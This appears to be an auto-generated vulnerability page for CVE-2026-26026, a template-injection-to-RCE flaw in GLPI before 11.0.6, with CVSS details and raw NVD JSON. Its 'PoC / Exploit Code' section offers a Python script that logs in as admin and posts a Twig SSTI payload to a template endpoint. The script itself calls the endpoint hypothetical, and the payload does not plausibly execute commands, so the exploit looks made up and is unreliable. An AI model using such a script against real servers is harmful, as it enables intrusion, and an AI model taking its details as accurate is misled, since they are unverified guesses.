Security Vulnerability Report
中文
CVE-2026-26026 CVSS 9.1 CRITICAL

CVE-2026-26026

Published: 2026-04-06 15:17:07
Last Modified: 2026-04-07 16:03:35
Source: [email protected]

Description

GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, template injection by an administrator lead to RCE. This vulnerability is fixed in 11.0.6.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* - VULNERABLE
GLPI >= 11.0.0, < 11.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-26026 (GLPI Template Injection) # Target: GLPI < 11.0.6 # Note: Requires Administrator privileges. target_url = "http://glpi-server.com" login_url = f"{target_url}/login.php" # 1. Authenticate as Admin session = requests.Session() creds = { "login": "admin", "password": "admin_password", "auth": "local" } session.post(login_url, data=creds) # 2. Prepare Payload (Twig SSTI) # Payload to execute 'id' command payload = "{{_self.env.display(\"id\")}}" # 3. Send Payload to Template Endpoint # Endpoint is hypothetical, adjust based on actual vulnerable path exploit_url = f"{target_url}/ajax/template.php" data = { "content": payload, "id": "1" } response = session.post(exploit_url, data=data) # 4. Check Result if response.status_code == 200: print("[+] Exploit sent successfully!") print(f"[+] Response: {response.text}") else: print("[-] Exploit failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-26026", "sourceIdentifier": "[email protected]", "published": "2026-04-06T15:17:07.093", "lastModified": "2026-04-07T16:03:34.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, template injection by an administrator lead to RCE. This vulnerability is fixed in 11.0.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.6", "matchCriteriaId": "7BF95FA7-1F5E-4D44-B291-5576720FB714"}]}]}], "references": [{"url": "https://github.com/glpi-project/glpi/security/advisories/GHSA-2c98-648q-h27h", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.